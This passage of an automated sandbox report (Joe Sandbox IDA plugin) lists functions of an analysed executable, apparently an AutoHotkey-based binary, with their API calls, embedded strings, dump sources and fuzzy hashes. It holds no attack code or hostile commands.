InterlockedIncrement.KERNEL32(03211860), ref: 0049BB3C

Strings

"M, xrefs: 0049BB1B

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: "M
API String ID: 3470314060-1273950097
Opcode ID: 2dfb938e88f6530729baa3849514d3759da789a44b9997187ee628550bd51274
Instruction ID: 8eef26ec37297c3eaa7ea68273438b9a74e48c63389c376942fcbfc5a4d57f44
Opcode Fuzzy Hash: 2dfb938e88f6530729baa3849514d3759da789a44b9997187ee628550bd51274
Instruction Fuzzy Hash: DE018831D01621ABCF21AB9AAA45B5E7FA0FB14724F15403BF40067790DB7C6941DBDD

Uniqueness

Uniqueness Score: -1.00%

Function 0045A680, Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 390COMMON

Download Yara Rule

APIs

joyGetDevCapsW.WINMM(?,?,000002D8,03215110,?,?), ref: 0045A6BF
_memset.LIBCMT ref: 0045A6D5
joyGetPosEx.WINMM ref: 0045A717

Strings

@%K, xrefs: 0045AA23
4, xrefs: 0045A707
@, xrefs: 0045AB92

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Caps_memset
String ID: 4$@$@%K
API String ID: 675830301-1404681216
Opcode ID: d8fd239e7f521c3d6d5a9d285d9454c0956dbb7d3df706f2bc5c804c54b7a116
Instruction ID: a15d4d708952bb518531b16cb86cdc534286a61c1b0ababb9603827d0a8d8a81
Opcode Fuzzy Hash: d8fd239e7f521c3d6d5a9d285d9454c0956dbb7d3df706f2bc5c804c54b7a116
Instruction Fuzzy Hash: D7E1D1316083028BD724CF15D44476AB7E1FF85316F948A6EDC9983692D73EA91CCB4B

Uniqueness

Uniqueness Score: -1.00%

Function 00407C63, Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 265COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00407E7E

Strings

float, xrefs: 00407DC5
<response command="property_set" success="%i" transaction_id="%e"/>, xrefs: 00407F30
string, xrefs: 00407C92
`, xrefs: 00407D82
integer, xrefs: 00407D9A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _free
String ID: <response command="property_set" success="%i" transaction_id="%e"/>$`$float$integer$string
API String ID: 269201875-1212563733
Opcode ID: dae8269fd15cc8c056ac336dd9f70191b084cace78a53e6546c7b2a5fc6b76ce
Instruction ID: 7a90660dffe35eb6f5eafc6d0b5061b8b6b216633bec5dc65be1447c49097d65
Opcode Fuzzy Hash: dae8269fd15cc8c056ac336dd9f70191b084cace78a53e6546c7b2a5fc6b76ce
Instruction Fuzzy Hash: 8191A97190C342AFC714DF28C484A2BBBE4BF94314F144A6EF594A7281D778E946CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004079CC, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 004993E4: __wcstoi64.LIBCMT ref: 004993DA

Part of subcall function 004075B1: __EH_prolog.LIBCMT ref: 004075B6

_free.LIBCMT ref: 00407C10

Part of subcall function 00406FFB: _free.LIBCMT ref: 00407063
Part of subcall function 00406FFB: _malloc.LIBCMT ref: 00407078

Strings

<response command="property_value" transaction_id="%e" encoding="base64" size=", xrefs: 00407BF0
<response command="property_get" transaction_id="%e"><property name="%e" fullname="%e" type="undefined" facet="" size="0" children="0"/></response>, xrefs: 00407B43
X, xrefs: 004079FD
<response command="property_get" transaction_id="%e">, xrefs: 00407BC6
</response>, xrefs: 00407C1A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _free$H_prolog__wcstoi64_malloc
String ID: </response>$<response command="property_get" transaction_id="%e">$<response command="property_get" transaction_id="%e"><property name="%e" fullname="%e" type="undefined" facet="" size="0" children="0"/></response>$<response command="property_value" transaction_id="%e" encoding="base64" size="$X
API String ID: 1251500923-4034246093
Opcode ID: e49873b15ca9984c6242a7354267dda0cdac51eab7e39ca39cf0eb99f1781c47
Instruction ID: 895475fe440a0e8206be52cb23cd738084155ae50b949bf4c07f933089b00c28
Opcode Fuzzy Hash: e49873b15ca9984c6242a7354267dda0cdac51eab7e39ca39cf0eb99f1781c47
Instruction Fuzzy Hash: 69718D7190C3469FC720DF65888095BBBE4AB84354F140A3FF491A72D1D778EA09CB6B

Uniqueness

Uniqueness Score: -1.00%

Function 0042BE40, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 177COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0042BE9B
_wcsrchr.LIBCMT ref: 0042BF5B
_memmove.LIBCMT ref: 0042C029

Strings

Function name too long., xrefs: 0042BE7A
Invalid method name., xrefs: 0042BF68
Out of memory., xrefs: 0042BF3A

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _memmove_wcsncpy_wcsrchr
String ID: Function name too long.$Invalid method name.$Out of memory.
API String ID: 893447047-2619123988
Opcode ID: 8cb8545d35509737b803778160f98771fd9e1aaf2b1f8929931ec973aeaea2b0
Instruction ID: 36f1e71327b4e12772b5a3164d5c8ff71315abc87e585eaaf32e01c1e2f5c0a5
Opcode Fuzzy Hash: 8cb8545d35509737b803778160f98771fd9e1aaf2b1f8929931ec973aeaea2b0
Instruction Fuzzy Hash: C551CEB17003169BD720AF24AC81AABB3A4EF54354F45852FE905C7352EB29E845CBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0042A820, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 174COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 0042A92A
_wcschr.LIBCMT ref: 0042A945

Part of subcall function 0042A790: GetFileAttributesW.KERNEL32(0042A85F), ref: 0042A7C0

Part of subcall function 0044EAD0: SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,00000000), ref: 0044EAE2

Strings

.ahk, xrefs: 0042A906
\Lib\, xrefs: 0042A850, 0042A887
#Include %-0.*s#IncludeAgain %s, xrefs: 0042A9F3
\AutoHotkey\Lib\, xrefs: 0042A86E

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: AttributesFile$FolderPath_wcschr
String ID: #Include %-0.*s#IncludeAgain %s$.ahk$\AutoHotkey\Lib\$\Lib\
API String ID: 3341327518-2992999288
Opcode ID: 76fa05a3a5e196dc0e5b8a4d7f83baedf7e1dd4dd6235e64fb05c181578d342e
Instruction ID: 2b6727ede25ff6554f7d2cce070f52f48353ce8c0fadc28ac74114079096fdaf
Opcode Fuzzy Hash: 76fa05a3a5e196dc0e5b8a4d7f83baedf7e1dd4dd6235e64fb05c181578d342e
Instruction Fuzzy Hash: BF51E3357042159BC714DF29E881BAB73A4EF85314F00482BED45C73A1E778AD66C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 0047E0E0, Relevance: 10.7, APIs: 7, Instructions: 174timeCOMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0047E109
_wcsncpy.LIBCMT ref: 0047E135
_wcsncpy.LIBCMT ref: 0047E16D
_wcsncpy.LIBCMT ref: 0047E1A1
_wcsncpy.LIBCMT ref: 0047E1D6
_wcsncpy.LIBCMT ref: 0047E20B
SystemTimeToFileTime.KERNEL32(?,?), ref: 0047E2B2

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _wcsncpy$Time$FileSystem
String ID:
API String ID: 456616543-0
Opcode ID: 4d8c8aef066391268d8faaf4736d77896b2b0fab6db539403296c7fad4393f75
Instruction ID: eeb6043eff36f26e66cbe33a47c08084e10b1550d717d74b535f6e5257448309
Opcode Fuzzy Hash: 4d8c8aef066391268d8faaf4736d77896b2b0fab6db539403296c7fad4393f75
Instruction Fuzzy Hash: 5F51187151430066D714DB2ACC42AABB3E5EFC8304F45CE6EF45AC7251F779E509835A

Uniqueness

Uniqueness Score: -1.00%

Function 00450380, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(?), ref: 004503B9
GetLastError.KERNEL32 ref: 004504BC
__itow.LIBCMT ref: 004504E8

Strings

DllCall, xrefs: 00450561
0, xrefs: 0045053F

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ErrorLast$__itow
String ID: 0$DllCall
API String ID: 3125673013-1800201163
Opcode ID: 212f00170b13700d8713bb1dd8c223ab4ee84c310fe2b46ee20d845f03c19934
Instruction ID: 42253284809489d720f09fe17914473d0c543fa6e6f9840ab9a5fb4b319a93dd
Opcode Fuzzy Hash: 212f00170b13700d8713bb1dd8c223ab4ee84c310fe2b46ee20d845f03c19934
Instruction Fuzzy Hash: C2619074E00208AFDF14CF98D884BAEBBB4FB05315F20422EE915A7391D778A945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00417030, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(004D6614), ref: 004170C8
GetSystemMetrics.USER32 ref: 00417140
GetSystemMetrics.USER32 ref: 00417146
GetCursorPos.USER32(?), ref: 004171A5

Strings

d, xrefs: 00417189

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: CursorMetricsSystem
String ID: d
API String ID: 3091566494-2564639436
Opcode ID: 92a704c4ed92267ed0bf1255e6b3ff339f58bf3d69280c7edb186ea560bc042c
Instruction ID: 6e2fbb60c436b99ce5d8ac5ea1f7da3587ff14c6c775432766a44ef274fa070a
Opcode Fuzzy Hash: 92a704c4ed92267ed0bf1255e6b3ff339f58bf3d69280c7edb186ea560bc042c
Instruction Fuzzy Hash: C051AC757093019BD728CF69D881BAA73E1BB88314F24493EE88587341E739E985CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004A9222, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PMDtoOffset.LIBCMT ref: 004A92F6
std::bad_exception::bad_exception.LIBCMT ref: 004A9320
__CxxThrowException@8.LIBCMT ref: 004A932E

Strings

Bad dynamic_cast!, xrefs: 004A9318

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Exception@8OffsetThrowstd::bad_exception::bad_exception
String ID: Bad dynamic_cast!
API String ID: 1176828985-2956939130
Opcode ID: 1bfdaace502a08d66eab87151262d2a97466586f6abdd456e4940c6bc0eca572
Instruction ID: c31cb9ddc9f0b44083bc5458835546f7a6548c3e0784ae4054bdbe7062bee7ed
Opcode Fuzzy Hash: 1bfdaace502a08d66eab87151262d2a97466586f6abdd456e4940c6bc0eca572
Instruction Fuzzy Hash: CB318376A00215AFCF14DF69C881B9E7BA1AF6A311F14489EF801E7391D73CED018B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040854C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63networkCOMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 00408568

Part of subcall function 0049938A: _xtoa@16.LIBCMT ref: 004993AA

_sprintf.LIBCMT ref: 00408587
send.WSOCK32(?,?,00000001,00000000,?,?,?,?,?,004AF0B4,004D86B8,004AF0B4), ref: 004085A4
send.WSOCK32(?,?,?,00000000,004AE8F8,?,?,?,?,?,004AF0B4,004D86B8,004AF0B4), ref: 004085C9

Strings

<?xml version="1.0" encoding="UTF-8"?>, xrefs: 00408579
An internal error has occurred in the debugger engine.Continue running the script without the debugger?, xrefs: 004085DC

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: send$__itow_sprintf_xtoa@16
String ID: <?xml version="1.0" encoding="UTF-8"?>$An internal error has occurred in the debugger engine.Continue running the script without the debugger?
API String ID: 3958313388-3162732081
Opcode ID: 10e5c5163cf5eea6815856fb51e600160377197c1779e43b0ee35b5642855614
Instruction ID: e775562c657b883c73647a80f0f5d7c6fcf6aab5ae091a2d498eaea18033f810
Opcode Fuzzy Hash: 10e5c5163cf5eea6815856fb51e600160377197c1779e43b0ee35b5642855614
Instruction Fuzzy Hash: 111104736006013BD710AA798D06B6777A8FB49334F10063AFD54E29D1EB34E9258AD9

Uniqueness

Uniqueness Score: -1.00%

Function 00418860, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57registrylibraryCOMMON

Download Yara Rule

APIs

ActivateKeyboardLayout.USER32(?,00000000,00000000,00000000), ref: 00418870
GetKeyboardLayoutNameW.USER32(?), ref: 004188A9
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?), ref: 004188C6
LoadLibraryW.KERNEL32(?), ref: 004188F5
ActivateKeyboardLayout.USER32(00000000,00000000), ref: 00418909

Strings

Layout File, xrefs: 004188DD

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: KeyboardLayout$Activate$LibraryLoadNameOpen
String ID: Layout File
API String ID: 1064788448-1055935358
Opcode ID: 83791da2760105ba48bd1fd06c4b91c67bf2ca71d9d0b4cf26787faa5d5d4512
Instruction ID: 1d42da2a0c9af0c93a057717f2aad633c61f7592ff33cc8b6911b3ca9f237508
Opcode Fuzzy Hash: 83791da2760105ba48bd1fd06c4b91c67bf2ca71d9d0b4cf26787faa5d5d4512
Instruction Fuzzy Hash: 2F11A331604305ABD620AF65DC88BA777ECEB85740F04482EBA45C2141EF38D945C669

Uniqueness

Uniqueness Score: -1.00%

Function 004548C0, Relevance: 9.4, APIs: 6, Instructions: 393COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,-0000F939,00000000,?,00000000,00000000,00000000,00000000), ref: 00454BAA
GetLastError.KERNEL32 ref: 00454BB0
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00454BD3
WideCharToMultiByte.KERNEL32(?,-0000F939,00000000,?,00010000,00000000,00000000,00000000), ref: 00454C0B
MultiByteToWideChar.KERNEL32(000004B0,00000000,00010000,00000000,00000000,00000000), ref: 00454C43
MultiByteToWideChar.KERNEL32(?,00000000,00010000,00000000,?,?), ref: 00454C6F

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 9ccd5a94efa3635ce9d68046690c079f5be511756f9147423230c83503020ce6
Instruction ID: 6ff570c6e18c19f4d37844fc4653ccdfa41e83f1365661b7d93001d0dcee96fa
Opcode Fuzzy Hash: 9ccd5a94efa3635ce9d68046690c079f5be511756f9147423230c83503020ce6
Instruction Fuzzy Hash: 70D1E6716042019FD710CF19D881B2BB3A5EBC432AF14866BED588F382D775EC89CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F020, Relevance: 9.4, APIs: 6, Instructions: 370COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040F041
UnregisterHotKey.USER32(?,?,004D6340,00000028,004D8728), ref: 0040F0DB

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: Unregister_memset
String ID:
API String ID: 2392160147-0
Opcode ID: 26bd3f5713dfceb7f4d4a2f22dec4b19a05b1ca8df11c797b9da683ab4e61799
Instruction ID: 903cfdac1d403b69279b55aed4a13c4832cd2a4b541d392805e49fb33cb42ae9
Opcode Fuzzy Hash: 26bd3f5713dfceb7f4d4a2f22dec4b19a05b1ca8df11c797b9da683ab4e61799
Instruction Fuzzy Hash: B9E1EF305096818AEB35CB24C444763BBA1AB52318F1845BFC8816BFD2D37DED8ED799

Uniqueness

Uniqueness Score: -1.00%

Function 00453500, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 296COMMON

Download Yara Rule

APIs

__wcsdup.LIBCMT ref: 004537AA
_free.LIBCMT ref: 0045380A

Strings

ERCP, xrefs: 004535F8
RegExMatch, xrefs: 004536F9
O, xrefs: 004537DC

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsdup_free
String ID: ERCP$O$RegExMatch
API String ID: 2088533098-700926398
Opcode ID: 5bd47d8ea9a74d942b5a3f426d9ff8788b248314ece57e50a13c219bddf85c95
Instruction ID: 2bc3568b66217993cafc8ed2489abe16208d8911d3ae9146efebfe85fc953fe1
Opcode Fuzzy Hash: 5bd47d8ea9a74d942b5a3f426d9ff8788b248314ece57e50a13c219bddf85c95
Instruction Fuzzy Hash: 68B1B2B1E00209AFCB10DF94C881AAFB7B5EF48356F14815AEC149B342E738DE49CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00447040, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00447110

Strings

$%K, xrefs: 00447225
Out of memory., xrefs: 0044717A
UseErrorLevel, xrefs: 00447073
1aA, xrefs: 0044708F

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: _free
String ID: $%K$1aA$Out of memory.$UseErrorLevel
API String ID: 269201875-1373778889
Opcode ID: 9a9c497c0b34c6b293ac8aff6e035b0d659fccfba16e11774473c1aa79bb89ec
Instruction ID: b4bd2d323930e6cbeb64e2b4431fc642d71c99cf0c6de0742b420be8745bf76b
Opcode Fuzzy Hash: 9a9c497c0b34c6b293ac8aff6e035b0d659fccfba16e11774473c1aa79bb89ec
Instruction Fuzzy Hash: 425103712087005BE720DF29C881B67B7E5AB95350F00496FF59187382D779EC07CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00413A30, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 145COMMON

Download Yara Rule

Strings

Too few parameters passed to function., xrefs: 00413A4B
Invalid option., xrefs: 00413BA4
{All}, xrefs: 00413B42
?, xrefs: 00413B29

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: ?$Invalid option.$Too few parameters passed to function.${All}
API String ID: 0-1706679301
Opcode ID: 8431f7199720f786b9adb5d33412f99358d7f2105f0045bfcea84719dd73589f
Instruction ID: 12bff3ff9249209aafa53d6d58d411054a15c567a89938993a42b5a5b195e706
Opcode Fuzzy Hash: 8431f7199720f786b9adb5d33412f99358d7f2105f0045bfcea84719dd73589f
Instruction Fuzzy Hash: 8F41283564C28146D321DE1998417FBBB809BA2366F14046FE8D047293E62DAA8DD7FF

Uniqueness

Uniqueness Score: -1.00%

Function 0047BB00, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 120COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0047BB31
WideCharToMultiByte.KERNEL32(00000000,00000400,jD@,00000000,00000000,00000000,00000001,00000000,?,?,00000000,00000001,?,0040446A), ref: 0047BB6C
